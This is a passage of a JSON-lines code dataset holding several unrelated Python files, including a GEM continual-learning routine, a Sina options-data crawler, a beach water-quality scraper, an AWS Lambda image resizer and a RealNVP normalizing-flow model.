int(self.model.hidden_sizes[-1] / self.n_task)\n else:\n self.nc_per_task = self.model.hidden_sizes[-1]\n\n def forward(self, x):\n y = self.model(x)\n return y\n\n\n def train_step(self, inputs, labels, get_class_offset, t):\n if t != self.old_task:\n self.observed_tasks.append(t)\n self.old_task = t\n\n self.train()\n # Update ring buffer storing examples from current task\n bsz = labels.data.size(0)\n endcnt = min(self.mem_cnt + bsz, self.n_memory)\n effbsz = endcnt - self.mem_cnt\n self.memory_inputs[t, self.mem_cnt: endcnt].copy_(\n inputs.data[: effbsz])\n if bsz == 1:\n self.memory_labels[t, self.mem_cnt] = labels.data[0]\n else:\n self.memory_labels[t, self.mem_cnt: endcnt].copy_(labels.data[: effbsz])\n self.mem_cnt += effbsz\n if self.mem_cnt >= self.n_memory:\n self.mem_cnt = 0\n\n # compute gradient on previous tasks\n if len(self.observed_tasks) > 1:\n for tt in range(len(self.observed_tasks) - 1):\n self.zero_grad()\n # fwd/bwd on the examples in the memory\n past_task = self.observed_tasks[tt]\n\n ptlogits = self.forward(self.memory_inputs[past_task])\n\n pt_class_offset = get_class_offset(past_task)\n\n ptloss = self.model.loss_fn(*self.model.compute_output_offset(ptlogits, self.memory_labels[past_task], *pt_class_offset))\n ptloss.backward()\n store_grad(self.parameters, self.grads, self.grad_dims, past_task)\n\n # now compute the grad on the current minibatch\n self.zero_grad()\n logits = self.forward(inputs)\n class_offset = get_class_offset(t)\n logits, labels = self.model.compute_output_offset(logits, labels, *class_offset)\n loss = self.model.loss_fn(logits, labels)\n loss.backward()\n\n # check if gradient violates constraints\n if len(self.observed_tasks) > 1:\n # copy gradient\n store_grad(self.parameters, self.grads, self.grad_dims, t)\n indx = torch.cuda.LongTensor(self.observed_tasks[:-1]) if self.cuda \\\n else torch.LongTensor(self.observed_tasks[:-1])\n dotp = torch.mm(self.grads[:, t].unsqueeze(0),\n self.grads.index_select(1, indx))\n if (dotp < 0).sum() != 0:\n project2cone2(self.grads[:, t].unsqueeze(1),\n self.grads.index_select(1, indx), self.margin)\n # copy gradients back\n overwrite_grad(self.parameters, self.grads[:, t], self.grad_dims)\n self.model.optimizer.step()\n acc = torch.eq(torch.argmax(logits, dim=1), labels).float().mean()\n\n return float(loss.item()), float(acc.item())\n\n def predict(self, inputs, t):\n return 
self.model.predict(inputs, t)","repo_name":"ssssss489/RACIL","sub_path":"model/GEM.py","file_name":"GEM.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"16364715805","text":"# Permutations with repetition (via itertools.product)\nfrom itertools import product\ndef solution(numbers, target):\n answer = 0\n for c in list(product([1, -1], repeat=len(numbers))):\n check = 0\n for j in range(len(numbers)):\n check += c[j] * numbers[j]\n if check == target:\n answer += 1\n return answer","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/Programmers/완전탐색/타겟 넘버_product.py","file_name":"타겟 넘버_product.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"9118184027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"Casper Wang\"\n__email__ = \"casprwang@gmail.com\"\n\n# expireDate\n# http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date=201706\n\nimport urllib.request\nimport json\nimport csv\nimport datetime\n\n\nFRONTROW = [\n 'Date', '买量', '买价bid', '最新价last', '卖价ask', '卖量', '振幅%change', '涨跌幅change',\n '行权strike', '买量', '买价', '最新价', '卖价', '卖量', '振幅', '涨跌幅', '行权'\n]\n\n# for EN user\n# FRONTROW = [\n# 'Date', 'ExpireDate', 'OptionType', 'Strike', 'Contract Name', 'Last',\n# 'Bid', 'Ask', 'Change', '%Change', 'Volume', 'OpenInterest',\n# 'ImpliedVolatility', 'UnderlyingPrice'\n# ]\n\n\ndef match_twins(month: int) -> list:\n prefix = 'http://hq.sinajs.cn/list=OP_'\n # suffix = '_51005017'\n suffix = '_510050'\n url1 = f'{prefix}UP{suffix}{str(month)}'\n url2 = f'{prefix}DOWN{suffix}{str(month)}'\n return get_paried_urls([url1, url2])\n\n\ndef get_paried_urls(twin_list: list) -> list:\n paired_url = []\n for url in twin_list:\n content = urllib.request.urlopen(url, None).read().decode('GBK')\n paired_url.append(get_all_name(content))\n return (re_pair(paired_url))\n\n\ndef get_all_name(content) -> list:\n quo_pos = content.find('\"')\n seg = content[quo_pos + 1:-3]\n stock_list = seg.split(',')\n return stock_list[:-1]\n\n\ndef re_pair(li) -> list:\n finished_pair = []\n for i in range(len(li[0])):\n middle_pair = []\n middle_pair.append(li[0][i])\n middle_pair.append(li[1][i])\n finished_pair.append(middle_pair)\n\n return finished_pair\n\n\n# PAIR to DATA\ndef data_parser(double_query):\n prefix = 'http://hq.sinajs.cn/list='\n\n row = []\n for code in double_query:\n url = prefix + code\n data = urllib.request.urlopen(url, None).read().decode('GBK')\n\n eq_pos = data.find('=')\n params_seg = data[eq_pos + 2:-3]\n params = params_seg.split(',')\n row.extend(params[0:8])\n return row\n\n\n# url->\ndef get_expire_url(month: str) -> str:\n prefixDate = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date='\n url = f'{prefixDate}{str(month)}'\n return url\n\n\ndef get_expire_date(url_link: str) -> str:\n with urllib.request.urlopen(url_link) as url:\n data = json.loads(url.read().decode())\n # print(data)\n return (data['result']['data']['expireDay'])\n\n\n# Writing to CSV\nwith open('sse_option_data.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n\n print('started checking and saving data, it might take a few minutes')\n for i in range(12):\n date_string = ''.join(\n (datetime.date.today() +\n datetime.timedelta(i * 365 / 12)).isoformat().split('-'))\n date = 
get_expire_date(get_expire_url(date_string[:6]))\n\n if len(match_twins(date_string[2:6])) == 0:\n print(f'no data found in month {date_string[4:6]}')\n else:\n writer.writerow([f'{date_string[:6]}'])\n print(f'found data from month {date_string[4:6]}, start saving')\n writer.writerow(FRONTROW)\n for pairs in match_twins(date_string[2:6]):\n writer.writerow([date] + data_parser(pairs))\n writer.writerow([])\n print(f'done with data from month {date_string[4:6]}')\n","repo_name":"casprwang/sse-option-crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"16536246457","text":"import copy\nimport logging\nimport re\nimport sys\nimport urllib2\n\nfrom BeautifulSoup import BeautifulSoup \nfrom calidadaguas import Sample\nfrom calidadaguas import SamplePoint\n\nclass NayadeScraping:\n beaches = []\n\n def __init__(self):\n logging.getLogger('NayadeScraping')\n logging.basicConfig(filename='scraping.log',level=logging.DEBUG)\n\n def scrap(self, id):\n data_soup = BeautifulSoup(urllib2.urlopen('http://nayade.msc.es/Splayas/ciudadano/ciudadanoVerZonaAction.do?codZona=' + str(id)).read())\n # Get the beach samples.\n samples_soup = BeautifulSoup(urllib2.urlopen('http://nayade.msc.es/Splayas/ciudadano/ciudadanoVerZonaAction.do?pestanya=3&codZona=' + str(id)).read())\n\n # This is ugly as hell, but I'm not used to BeautifulSoup.\n data_values = data_soup.findAll('td', {'class' : 'valorCampoI'})\n\n # Check is this a valid ID. There are some keys that are not present, in that case, we continue.\n if data_values[5].string == None:\n logging.debug('Data could not be loaded from id %d', id)\n return\n\n sample_points = samples_soup.findAll('td', {'class' : 'nombreCampoNI'})\n points = []\n samples = []\n for i in range(0, len(sample_points), 6):\n sample_point = SamplePoint.SamplePoint()\n sample_point.name = sample_points[i].string.strip()[-3:]\n # Are we done? Some points have incidents reported, we ignore them.\n if sample_points[i].string.strip() == 'Fecha Cierre Incidente':\n break\n point = data_soup.find(text = re.compile(sample_points[i].string.strip()[-5:].replace('(','').replace(')','')))\n # There are two empty tds. 
This is awesomic.\n geodata = point.findNext('td', {'class' : 'valorCampoI'})\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.x = geodata.string\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.y = geodata.string\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.zone = geodata.string\n points.append(sample_point)\n\n # Parse the current samples.\n tds = sample_points[i].findAllNext('td', {'class' : 'valorCampoI'})\n for j in range(0, len(tds), 4):\n sample = Sample.Sample()\n sample.date = tds[j].string\n sample.escherichia_coli = tds[j+1].string\n sample.enterococo = tds[j+2].string\n sample.notes = tds[j+3].string\n sample.samplepoint = sample_point\n samples.append(sample)\n \n if tds[j+3].findNext('td').findNext('td').findNext('td') == None or tds[j+3].findNext('td').findNext('td').findNext('td').get('class', None) == 'nombreCampoNI':\n break\n\n # We cannot rely in the order in which tds are created, because some data is variable.\n # Parse again looking for the UTM coordinates.\n\n # Generate the beach structure as it will be written in csv columns.\n beach = { \n 'Comunidad': data_values[0].string,\n 'Provincia': data_values[1].string,\n 'Municipio': data_values[2].string,\n 'Nombre': data_values[5].string,\n 'adoptada_por': 'penyaskito (scrapping)',\n }\n # Normalize data. We need to strip bad chars that could act as separators and fix the encoding.\n for key, value in beach.iteritems():\n beach[key] = value.strip().encode(\"utf-8\") \n\n # Save a row for each sample point.\n for sample in samples:\n logging.info('Data obtained for %s with id %d and sample %s %s', beach['Nombre'], id, sample.samplepoint.name, sample.date)\n beach['punto_muestreo'] = sample.samplepoint.name\n beach['utm_zone'] = sample.samplepoint.zone\n beach['utm_x'] = sample.samplepoint.x\n beach['utm_y'] = sample.samplepoint.y\n beach['fecha_toma'] = sample.date\n beach['escherichia_coli'] = sample.escherichia_coli\n beach['enterococo'] = sample.enterococo\n beach['observaciones'] = sample.notes\n\n # Save the sample point\n self.beaches.append(copy.copy(beach))\n","repo_name":"openkratio/calidad-aguas","sub_path":"old/calidadaguas/NayadeScraping.py","file_name":"NayadeScraping.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71429473448","text":"import boto3\nimport uuid\nimport traceback\nfrom PIL import Image\nimport PIL.Image\nfrom resizeimage import resizeimage\nimport os\n\nTHUMBNAIL_SIZE = [250, 250]\n\ndef image_resize(image_source_path, resized_cover_path):\n with Image.open(image_source_path) as image:\n cover = resizeimage.resize_cover(image, THUMBNAIL_SIZE)\n cover.save(resized_cover_path, image.format)\n\ndef handler(event, context):\n s3_client = boto3.client('s3')\n try: \n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n item_uuid=uuid.uuid4()\n os.mkdir('/tmp/{}'.format(item_uuid))\n download_path = '/tmp/{}/{}'.format(item_uuid, key)\n upload_path_thumbnail = '/tmp/resized-{}'.format(key)\n uploadToBucket = 'cloudcomputingcourse2018output'\n uploadFilename = 'resized/resized-'+key \n \n s3_client.download_file(bucket, key, download_path)\n image_resize(download_path, upload_path_thumbnail)\n s3_client.upload_file(upload_path_thumbnail, \n uploadToBucket, uploadFilename)\n except 
Exception:\n print(traceback.format_exc())\n \n","repo_name":"arshdeepbahga/cloud-computing-solutions-architect-book-code","sub_path":"Chapter-4/resizeimages/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"74287584806","text":"# Handles various processes in game\n\nimport random\nimport json\nimport constants as c\n\n\ndef get_all_texts():\n \"\"\"Retrieve texts from JSON\"\"\"\n try:\n with open(c.text_file_name, \"r\") as f:\n return json.load(f)\n except:\n return [\"texts.json doesn't exist. Run reqtexts.py first.\"]\n\n\ndef get_text(all_texts):\n \"\"\"Get one text from all texts and remove it from the list (Mutates list)\"\"\"\n text = all_texts.pop(int(random.random() * len(all_texts)))\n\n if len(all_texts) <= 0:\n all_texts.extend(get_all_texts())\n\n return text\n\n\ndef get_best_time():\n try:\n with open(c.best_time_file_name, \"r\") as f:\n return f.read()\n except:\n return \"\"\n\n\ndef compare_best_time(current_time):\n \"\"\"Compare best time, and if so saves best time to txt file\"\"\"\n best_time = get_best_time()\n\n if best_time == \"\" or float(current_time) < float(best_time):\n with open(c.best_time_file_name, \"w\") as f:\n f.write(str(round(current_time, 3)))\n\n return True\n else:\n return False\n\n\ndef setup_player_enemy_interaction(player, enemy, enemy_hp_bar):\n \"\"\"This is where the player actually deal damage after attack animation\"\"\"\n def player_attack(damage):\n # Damage\n enemy.hurt_damage(damage)\n # Update enemy hp bar\n enemy_hp_bar.value = enemy.current_health / enemy.health\n\n player.attack_callback = player_attack\n\n\ndef reset_state(player, enemy):\n \"\"\"Reset player damage and enemy health (For restart game)\"\"\"\n player.reset_damage()\n enemy.current_health = c.ENEMY_HEALTH\n","repo_name":"bluwy/supertyper","sub_path":"processhandle.py","file_name":"processhandle.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22804495107","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nfrom typing import List\nfrom pathlib import Path\n\n\ndef rmdawn(in_files: List[str]) -> str:\n \"\"\"Create an R markdown file from YAML, markdown, and code files.\n\n :param in_files: A list of YAML, markdown, and code file names.\n :param return: A string containing the output R markdown file.\n \"\"\"\n return \"\\n\\n\".join([\n # YAML files\n \"---\\n\" + Path(name).read_text() + \"\\n---\"\n if name.endswith((\".yaml\", \"yml\"))\n\n # Code files that start with knitr spin comments\n else re.sub(\"#\\+ (.*?)\\n\", r\"```{\\1}\\n\",\n Path(name).read_text()) + \"\\n```\"\n if Path(name).read_text().startswith(\"#+\")\n and name.endswith((\".py\", \".r\", \".R\"))\n\n # R files that do not start with knitr spin comments\n else \"```{r}\\n\" + Path(name).read_text().strip() + \"\\n```\"\n if name.endswith((\".r\", \".R\"))\n\n # Python files that do not start with knitr spin comments\n else \"```{python}\\n\" + Path(name).read_text().strip() + \"\\n```\"\n if name.endswith(\".py\", )\n\n # All other files (markdown, txt, etc.)\n else Path(name).read_text()\n for name in in_files\n 
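# Note the branch order above: the knitr-spin check must precede the generic .R/.py fences, otherwise spin-style sources would never be detected.\n 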
])\n","repo_name":"py4ds/rmdawn","sub_path":"src/rmdawn/rmdawn.py","file_name":"rmdawn.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3942005287","text":"tests = int(input())\n\nfor _ in range(tests):\n n = int(input())\n arr = list(map(int, input().split()))\n arr.sort()\n \n p1 = 0\n p2 = 1\n flag = False\n \n while p2 < n:\n if n == 1:\n print(\"YES\")\n break\n \n elif arr[p2] - arr[p1] > 1:\n print(\"NO\")\n flag = True\n break\n \n p1+=1\n p2+=1\n \n if flag == False:\n print(\"YES\")\n \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"removeSmallest.py","file_name":"removeSmallest.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3732376385","text":"import pybullet as pb\nfrom highlevel_planning_py.tools.util import ObjectInfo\nfrom highlevel_planning_py.sim.world import WorldPybullet\nimport numpy as np\nfrom scipy.spatial.transform import Rotation as R\nimport os\n\n\ndef get_cupboard_info(base_dir, pos, orient, scale=0.6, force_fixed_base=False):\n urdf_file = \"parsed_xacros/cupboard2.urdf\"\n urdf = os.path.join(base_dir, urdf_file)\n\n world = WorldPybullet(\"direct\", sleep=False)\n tmp_model = world.add_model(urdf, position=pos, orientation=orient, scale=scale)\n\n rot = R.from_quat(orient)\n yaw = rot.as_euler(\"xyz\", degrees=False)\n nav_angle = yaw[2] + np.pi * 3.0 / 2.0\n\n drawer_joint_idx = list()\n handle_link_idx = list()\n for i in range(pb.getNumJoints(tmp_model.uid, physicsClientId=world.client_id)):\n info = pb.getJointInfo(tmp_model.uid, i, physicsClientId=world.client_id)\n joint_name = info[1] if type(info[1]) is str else info[1].decode(\"utf-8\")\n # print(info)\n if \"drawer_joint\" in joint_name and len(joint_name) == 13:\n drawer_joint_idx.append(i)\n if \"drawer_handle_dummy_joint\" in joint_name:\n # handle_num = int(joint_name.split(\"drawer_handle_dummy_joint\")[1])\n handle_link_idx.append(info[16])\n\n world.close()\n\n grasp_orient = R.from_euler(\"xzy\", [180, 0, -45], degrees=True)\n return ObjectInfo(\n urdf_path_=urdf_file,\n urdf_relative_to_=\"asset_dir\",\n init_pos_=np.array(pos),\n init_orient_=np.array(orient),\n init_scale_=scale,\n grasp_pos_={link: [np.array([0.0, 0.0, 0.0])] for link in handle_link_idx},\n grasp_orient_={link: [grasp_orient.as_quat()] for link in handle_link_idx},\n nav_angle_=nav_angle,\n nav_min_dist_=0.6,\n grasp_links_=handle_link_idx,\n joint_setting_=[\n {\"jnt_idx\": i, \"mode\": pb.VELOCITY_CONTROL, \"force\": 0.0}\n for i in drawer_joint_idx\n ],\n force_fixed_base_=force_fixed_base,\n )\n","repo_name":"ethz-asl/high_level_planning","sub_path":"highlevel_planning_ros/src/highlevel_planning_py/sim/cupboard.py","file_name":"cupboard.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22155651008","text":"import pandas as pd\nimport numpy as np\nfrom ast import literal_eval\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.model_selection import StratifiedKFold\nimport sys\n\n\ndef select_top_features(train_df, test_df, feature_importance_df, num_features, model_name):\n\n\tfeature_importance_df = feature_importance_df.sort_values(model_name, ascending = False)\n\tfeatures = 
feature_importance_df.iloc[:num_features]['Features'].tolist()\n\n\ttrain_df = train_df[features]\n\ttest_df = test_df[features]\n\n\treturn train_df, test_df\n\ndef ensemble_model(parameters_dataset, train_dataset, test_dataset, feature_importance_dataset):\n\tparameters_df = pd.read_csv(parameters_dataset)\n\ttrain_df = pd.read_csv(train_dataset)\n\ttest_df = pd.read_csv(test_dataset)\n\tfeature_importance_df = pd.read_csv(feature_importance_dataset)\n\n\tprint(train_df.shape)\n\tprint(test_df.shape)\n\n\ttrain_df['record_id'] = train_df.index\n\n\ty_train = train_df['READMISSION']\n\n\tk_folds = StratifiedKFold(n_splits=5, random_state=42, shuffle=True)\n\n\tfor i in range(parameters_df.shape[0]):\n\t\tmodel_name = parameters_df.iloc[i]['Name']\n\n\t\tprint(model_name)\n\n\t\tmodel_params = parameters_df.iloc[i]['Best Parameters']\n\t\tmodel_params = literal_eval(model_params)\n\n\t\tif 'Logistic Regression' in model_name:\n\t\t\tmodel_params['n_jobs'] = -1\n\t\t\tmodel_type_name = 'Logistic Regression'\n\t\t\tmodel = LogisticRegression(**model_params)\n\t\telif 'Random Forest' in model_name:\n\t\t\tmodel_params['n_jobs'] = -1\n\t\t\tmodel_type_name = 'Random Forest All'\n\t\t\tmodel = RandomForestClassifier(**model_params)\n\t\telse:\n\t\t\tmodel_type_name = 'XGBoost'\n\t\t\tmodel = XGBClassifier(**model_params)\n\n\t\tif 'Top' in model_name:\n\t\t\tnum_features = int(model_name.split(' ')[-1])\n\t\t\tX_train, X_test = select_top_features(train_df, test_df, feature_importance_df,\n\t\t\t\tnum_features, model_type_name)\n\t\telse:\n\t\t\tX_train = train_df.drop(['READMISSION', 'record_id'], axis = 1)\n\t\t\tX_test = test_df.drop('READMISSION', axis = 1)\t\t\t\n\n\t\tindividual_model_pred = pd.DataFrame()\n\n\t\tfor train_index, test_index in k_folds.split(X_train, y_train):\n\t\t\tmodel.fit(X_train.iloc[train_index], y_train[train_index])\n\t\t\tpredictions = model.predict(X_train.iloc[test_index]).reshape(-1, 1)\n\t\t\tdata = np.concatenate([test_index.reshape(-1, 1), predictions], axis = 1)\n\t\t\tindividual_model_pred_sub = pd.DataFrame(data, columns=['record_id', model_name + '_Prediction'])\n\t\t\tindividual_model_pred = pd.concat([individual_model_pred, individual_model_pred_sub])\n\n\t\ttrain_df = train_df.merge(individual_model_pred, how = 'left', on = 'record_id')\n\t\t\n\t\tmodel.fit(X_train, y_train)\n\t\ttest_df[model_name + '_Prediction'] = model.predict(X_test).reshape(-1, 1)\n\n\ttrain_df = train_df.drop('record_id', axis = 1)\n\n\tprint(train_df.shape)\n\tprint(test_df.shape)\n\n\ttrain_df.to_csv(train_dataset.replace('.csv', '_ensemble.csv'), index = False)\n\ttest_df.to_csv(test_dataset.replace('.csv', '_ensemble.csv'), index = False)\n\nparameters_dataset = sys.argv[1]\ntrain_dataset = sys.argv[2]\ntest_dataset = sys.argv[3]\nfeature_importance_dataset = sys.argv[4]\nensemble_model(parameters_dataset, train_dataset, test_dataset, feature_importance_dataset)\n\n\n\n","repo_name":"pateli18/Machine-Learning-Nanodegree","sub_path":"capstone_project/helper_functions/create_ensemble_model.py","file_name":"create_ensemble_model.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28942305810","text":"import tensorflow as tf\nfrom TFRunner import TFRunner\nimport multiprocessing\nfrom glob import glob\nfrom DatasetLoader import DatasetLoader\nfrom Model import Model\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_integer('training_epochs', 20, 'number of times to 
run through training dataset')\nflags.DEFINE_integer('batch_size', 50, 'batch size')\nflags.DEFINE_string('train_files_glob', './input/train*.tfrecords', 'glob for TFRecords files containing training data')\nflags.DEFINE_string('model_file', './model.ckpt', 'path to save trained model parameters to')\nflags.DEFINE_integer('read_threads', multiprocessing.cpu_count(), 'number of reading threads')\nflags.DEFINE_string('profile', None, 'a Chrome trace file will be written at the specified path for the first training batch')\nflags.DEFINE_string('summary', './tensorboard_train', 'Tensorboard output directory')\n\n# Training input\ndataset_loader = DatasetLoader()\nkeep_prob_holder = tf.placeholder(tf.float32, shape = ())\nimage_batch, label_batch = dataset_loader.input_shuffle_batch(\n glob(FLAGS.train_files_glob), FLAGS.batch_size, FLAGS.read_threads, num_epochs = FLAGS.training_epochs)\nlabel_batch = tf.cast(label_batch, tf.float32)\n\n# Model, loss function, and training op\ninferred_labels = Model.create_graph(image_batch, keep_prob_holder)\ncross_entropy = -tf.reduce_sum(tf.cast(label_batch, tf.float32) * tf.log(tf.maximum(inferred_labels, 1e-10)),\n reduction_indices=[1])\nbatch_avg_cross_entropy = tf.reduce_mean(cross_entropy)\ntraining_op = tf.train.AdamOptimizer(1e-4).minimize(batch_avg_cross_entropy)\n\n# Add loss and training accuracy to Tensorboard output\ncorrect_prediction = tf.equal(tf.argmax(inferred_labels, 1), tf.argmax(tf.cast(label_batch, tf.float32), 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar(\"loss\", batch_avg_cross_entropy)\ntf.summary.scalar(\"training accuracy\", accuracy)\n\n# Run graph\nTFRunner.run(\n training_op,\n feed_dict = {keep_prob_holder: 0.5},\n save_checkpoint = FLAGS.model_file,\n profile = FLAGS.profile,\n summary = FLAGS.summary,\n summary_every = 10\n)\n","repo_name":"lightcycle/MachineLearningWithTensorFlow","sub_path":"Example-PhotoOrientation/train/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27847263369","text":"#Family name: Ogunsanya Toluwani Damilola\n# Student number: 8677256\n# Course: IT1 1120\n# Assignment Number 5 Part 3\ndef digit_sum(n):\n '''(list of integers) -> integers\n returns the sum of all digits in a given number'''\n if n > 0:\n\n x = 10*(round(n/10 - n//10,1)) + digit_sum(n//10)\n return int(x)\n return 0\n\ndef digital_root(n):\n '''(list of integers) -> integers\n returns the sum of all digits as an integer less than 10'''\n x = n\n\n if x > 10:\n x = digit_sum(x)\n\n if x >10:\n x = digital_root(x)\n\n return x\n\n\n","repo_name":"ToluwaniO/ITI1120","sub_path":"a5_8677256/a5_part3_8677256.py","file_name":"a5_part3_8677256.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21524493583","text":"import abc\nfrom dataclasses import dataclass\nfrom typing import Any\n\nimport numpy as np\nfrom dm_env import specs\n\nfrom mava.components.jax import Component\nfrom mava.core_jax import SystemBuilder\n\n\n@dataclass\nclass ExtrasLogProbSpecConfig:\n pass\n\n\nclass ExtrasSpec(Component):\n @abc.abstractmethod\n def __init__(self, config: Any) -> None:\n \"\"\"Initialise extra specs\n\n Args:\n config : ExtrasSpecConfig\n \"\"\"\n self.config = config\n\n @staticmethod\n def name() -> str:\n \"\"\"Returns name of ExtrasSpec class\n\n Returns:\n 
\"extras_spec\": name of ExtrasSpec class\n \"\"\"\n return \"extras_spec\"\n\n\nclass ExtrasLogProbSpec(ExtrasSpec):\n def __init__(\n self,\n config: ExtrasLogProbSpecConfig = ExtrasLogProbSpecConfig(),\n ):\n \"\"\"Class that adds log probs to the extras spec\n\n Args:\n config : ExtrasLogProbSpecConfig\n \"\"\"\n self.config = config\n\n def on_building_init_end(self, builder: SystemBuilder) -> None:\n \"\"\"Create extra specs after builder has been initialised\n\n Args:\n builder: SystemBuilder\n\n Returns:\n None.\n\n \"\"\"\n agent_specs = builder.store.ma_environment_spec.get_agent_environment_specs()\n builder.store.extras_spec = {\"policy_info\": {}}\n\n for agent, spec in agent_specs.items():\n # Make dummy log_probs\n builder.store.extras_spec[\"policy_info\"][agent] = np.ones(\n shape=(), dtype=np.float32\n )\n\n # Add the networks keys to extras.\n int_spec = specs.DiscreteArray(len(builder.store.unique_net_keys))\n agents = builder.store.ma_environment_spec.get_agent_ids()\n net_spec = {\"network_keys\": {agent: int_spec for agent in agents}}\n builder.store.extras_spec.update(net_spec)\n","repo_name":"alaterre/Mava","sub_path":"mava/systems/jax/ippo/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"22307286312","text":"\"\"\"Remove unnecessary columns\n\nRevision ID: 73765744a1f6\nRevises: 37f73a9d15d5\nCreate Date: 2022-04-02 11:19:02.574169+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"73765744a1f6\"\ndown_revision = \"37f73a9d15d5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"collectibles\", \"owned\")\n op.drop_column(\"records\", \"completed\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"records\", sa.Column(\"completed\", sa.BOOLEAN(), autoincrement=False, nullable=False))\n op.add_column(\"collectibles\", sa.Column(\"owned\", sa.BOOLEAN(), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/alembic/versions/73765744a1f6_.py","file_name":"73765744a1f6_.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"41129170648","text":"\"\"\"Defines the neural network, losss function and metrics\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# defining RealNVP network (https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb)\nclass RealNVP(nn.Module): # base class Module\n def __init__(self, nets, nett, mask, prior, system, input_dimension):\n super(RealNVP, self).__init__()\n\n self.prior = prior\n self.mask = nn.Parameter(mask, requires_grad=False)\n self.t = torch.nn.ModuleList([nett() for _ in range(len(mask))]) # translation function (net)\n self.s = torch.nn.ModuleList([nets() for _ in range(len(mask))]) # scaling function (net)\n # nn.ModuleList is basically just like a Python list, used to store a desired number of nn.Module’s.\n self.logp = 1.0 # initialize to 1\n self.system = system # class of what molecular system are we considering. E.g. 
Ising.\n self.orig_dimension = input_dimension # tuple describing original dim. of system. e.g. Ising Model with N = 8 would be (8,8)\n\n def g(self, z):\n log_R_zx, x = z.new_zeros(z.shape[0]), z\n\n for i in range(len(self.t)): # for each layer\n x_ = x*self.mask[i] # splitting features between channels.\n # features selected here used to compute s(x) and f(x) but not updated themselves yet.\n s = self.s[i](x_)*(1 - self.mask[i])\n t = self.t[i](x_)*(1 - self.mask[i])\n x = x_ + (1 - self.mask[i]) * (x * torch.exp(s) + t)\n log_R_zx += torch.sum(s,-1)\n return x, log_R_zx\n\n def f(self, x):\n log_R_xz, z = x.new_zeros(x.shape[0]), x\n\n # new_zeros(size) returns a Tensor of size \"size\" filled with 0s\n for i in reversed(range(len(self.t))): # move backwards through layers\n z_ = self.mask[i] * z # tensor of size num samples x num features\n s = self.s[i](z_) * (1-self.mask[i]) # self.s[i] is the entire sequence of scaling operations\n t = self.t[i](z_) * (1-self.mask[i])\n z = (1 - self.mask[i]) * (z - t) * torch.exp(-s) + z_\n log_R_xz -= s.sum(dim=-1)\n # each pass through here applies all operations defined in nets() and all the ones defined in nett()\n # self.s[1](z_) is not the same as self.s[3](z_)\n self.log_R_xz = log_R_xz # save so we can reference it later\n return z, log_R_xz\n\n def forward(self, x):\n z, self.logp = self.f(x)\n return z\n\n def log_prob(self,x):\n z, logp = self.f(x) # z = f(x)\n return self.prior.log_prob(z) + logp\n\n def sample(self, batchSize):\n z = self.prior.sample_n(batchSize)\n logp = 